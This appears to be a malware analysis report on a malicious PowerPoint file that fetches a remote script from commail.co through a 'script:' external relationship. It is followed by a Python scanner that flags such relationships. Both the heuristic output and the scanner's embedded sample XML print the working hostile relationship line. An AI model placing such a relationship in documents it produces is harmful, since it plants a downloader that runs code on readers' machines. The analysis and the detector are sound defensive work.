Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0e8cea4dfae048d9…

MALICIOUS

Office (OOXML)

Size: 133.6 KB
Created: 2017-10-23 00:57:05 UTC
Authoring application: Microsoft Office PowerPoint 14.0000
First seen: 2018-03-04
MD5: 4d85904b15c0adc8664f71bc2c5496bf
SHA-1: f030301ffb06c8a5a827c6b9b3c87b0ce3448466
SHA-256: 0e8cea4dfae048d90fb023144b1692837aaab6e3e51ee1a9e6b8f302fe470d53
Risk score: 80

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment

The critical ClamAV detection and the medium OOXML_EXTERNAL_REL heuristic agree on the same artifact: the slide relationship part ppt/slides/_rels/slide1.xml.rels contains a relationship whose target is not another part of the package but a remote resource, and that target uses the script: scheme rather than http or https. A script: target is resolved by Windows as a URL moniker: the remote resource is fetched and handed to the scriptlet handler, so the content served from commail.co runs as script as soon as PowerPoint resolves the relationship (for example when the slide action that references it fires), with no VBA macro involved. This makes the file a downloader whose second stage is retrieved at open time; the payload itself was not retrieved during static analysis, so its behaviour is not known from this report. Delivery as a phishing attachment (T1566.001) is the most likely vector for a PowerPoint file of this kind.

Heuristics (2)

  • ClamAV: Doc.Downloader.PPTRemoteScript-6838713-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.PPTRemoteScript-6838713-0
  • External relationship medium OOXML_EXTERNAL_REL
    External target in ppt/slides/_rels/slide1.xml.rels: script:http:\\commail.co:5453\qqqzqa
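The following Python script is an added illustration of the OOXML_EXTERNAL_REL check, not code from the report generator or from ClamAV: it opens an OOXML package as a ZIP, parses every *.rels part, and reports each relationship with TargetMode="External", flagging targets whose scheme is anything other than http, https or mailto. The package it scans is constructed inline and holds only the parts the scanner touches; the script: target is the one reported above, while the benign https hyperlink, the oleObject relationship type and the domain example.com are assumptions made so the output shows an ordinary external link next to the abnormal one.

```python
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Constructed slide relationship part. The script: target is the one reported
# in the heuristic above; the hyperlink entry and the oleObject Type are
# assumptions so that one ordinary and one abnormal external target coexist.
SAMPLE_SLIDE_RELS = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/agenda" TargetMode="External"/>
  <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="script:http:\\commail.co:5453\qqqzqa" TargetMode="External"/>
</Relationships>
"""

# Schemes that are unremarkable for an External relationship in a slide deck.
# Everything else (script:, mshta:, file:, UNC paths, drive letters) is flagged.
ORDINARY_SCHEMES = {"http", "https", "mailto"}


def classify_target(target):
    """Return (scheme, suspicious) for an External relationship target."""
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.-]*):", target)
    scheme = m.group(1).lower() if m else ""
    return scheme, scheme not in ORDINARY_SCHEMES


def scan_external_rels(package_bytes):
    """Walk every *.rels part of an OOXML package and describe each
    relationship whose TargetMode is External."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            # ElementTree keeps this self-contained; on real samples parse
            # with defusedxml so entity-expansion tricks cannot hurt the scanner.
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                scheme, suspicious = classify_target(target)
                findings.append({
                    "part": name,
                    "id": rel.get("Id"),
                    "type": rel.get("Type", "").replace(REL_TYPE_BASE, ""),
                    "target": target,
                    "scheme": scheme,
                    "suspicious": suspicious,
                })
    return findings


def build_sample_pptx():
    """Constructed minimal package with only the parts the scanner reads;
    it is not the analysed sample and will not open in PowerPoint."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels",
                   '<?xml version="1.0" encoding="UTF-8"?>'
                   '<Relationships xmlns="%s">'
                   '<Relationship Id="rId1" Type="%sofficeDocument" Target="ppt/presentation.xml"/>'
                   '</Relationships>' % (RELS_NS, REL_TYPE_BASE))
        z.writestr("ppt/slides/slide1.xml", "<sld/>")
        z.writestr("ppt/slides/_rels/slide1.xml.rels", SAMPLE_SLIDE_RELS)
    return buf.getvalue()


if __name__ == "__main__":
    # Pass a .pptx/.docx/.xlsx path to scan a real file; otherwise use the sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pptx()
    for hit in scan_external_rels(data):
        flag = "SUSPICIOUS" if hit["suspicious"] else "external  "
        print(f"{flag} {hit['part']} {hit['id']} [{hit['type']}] -> {hit['target']}")
```

Run with a path to scan a real package; all three OOXML formats use the same relationship model, so the check applies to .docx and .xlsx as well. Note that TargetMode="External" on its own is not malicious (every hyperlink in a deck is one); what separates this sample from a normal deck is the scheme of the target, which is why the triage decision is made on the scheme rather than on the mere presence of an external relationship.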